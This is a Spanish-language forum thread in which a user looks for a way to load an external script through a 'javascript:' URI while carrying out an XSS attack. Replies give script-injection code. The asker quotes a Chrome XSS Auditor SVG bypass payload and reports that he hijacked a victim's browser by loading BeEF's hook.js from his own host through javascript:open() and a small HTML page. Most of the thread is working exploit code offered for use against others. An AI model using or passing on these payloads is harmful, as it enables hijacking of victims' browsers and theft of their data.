Cómo incluir un script de otra página utilizando "javascript:"?

[Ethicalsk]

Buenas! la forma que conozco para agregar un script de otra página es:

Código (javascript) [Seleccionar] Expandir

<script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

Código (javascript) [Seleccionar] Expandir

javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

Código (javascript) [Seleccionar] Expandir

javascript:src="www.web.com/script.js"

tampoco funcionó:

Código (javascript) [Seleccionar] Expandir

javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!

[engel lex]

Código (javascript) [Seleccionar] Expandir

javascript:
var src="http://loquesea.com/script.js";
var element1 = document.createElement("script");
element1.src = src;
element1.type="text/javascript";
document.getElementsByTagName("head")[0].appendChild(element1);


Lo puse por línea para que sea legible, simplemente copia eso como marcador y cambia el src por el de tu gusto

[Ethicalsk]

Hola engel! Muchas gracias, es bastante parecido a lo que hice en mi tercer intento, pero no me está funcionando. Siendo más específico, lo que estaba queriendo hacer es incluir el hook.js de beEF utilizando éste bypass para los filtros de las versiones más nuevas de Chrome:

https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/

Que sería el siguiente:

https://brutelogic.com.br/xss.php?a=guest!+Watch+the+video+before+proceeding:%3Cbr%3E%3Cbr%3E%3Csvg+width=12cm+height=9cm%3E%3Ca%3E%3Cimage+href=//brutelogic.com.br/yt.jpg+/%3E%3Canimate+attributeName=href+values=javas%26%2399ript:alert(1)%3E

entonces yo pense que al final en vez de usar javascript:alert(1), podría incluir algo como lo que me mandaste vos, pero cuando pruebo en la consola del chrome no logro secuestrar mi navegador. Mira:



según lo que me responde la consola, el script parece haberse formado correctamente, pero sin embargo no logro secuestrar el navegador, sino en Online Browsers dentro del beEF ya tendría que ver la IP del navegador...

Tenés algúna idea sobre como resolver ésto? Saludos!

[engel lex]

el script está incluido... no tienes que cargar alguna funciòn o algo? no depende de otro? revisaste las peticiones a ver si no están fallando?

[Ethicalsk]

Cuando el hook.js se llega a cargar en el navegador de la víctima ya se secuestra el navegador, no hace falta nada más. Recién estuve fijándome lo que me decías de revisar las solicitudes, y ahí está el tema... Desde la consola del navegador no se envía ninguna consulta... Y la consola solo la estaba usando para probar, pero voy a ver que consulta se hace cuando mando directamente el enlace junto con esas lineas de codigo. Cuando lo pueda resolver escribo por aca. Saludos!


Actualizo!

Ya pude resolver el problema, en éste caso intente algo distinto. Utilicé:

javascript:open(//mi_dns/beef.html/)

y adentro de beef.html tengo:

Código [Seleccionar] Expandir

<html>
<head>
<script src="http://mi_dns:3000/hook.js"></script>
</head>
<body>
</body>
</html>

con ésto pude secuestrar satisfactoriamente el navegador de la víctima a través de beEF bypasseando los ultimos filtros de chrome. Después me gustaría hacer un video explicando cómo lograr ésto y que hay que tener en cuenta para lograrlo.

Saludos!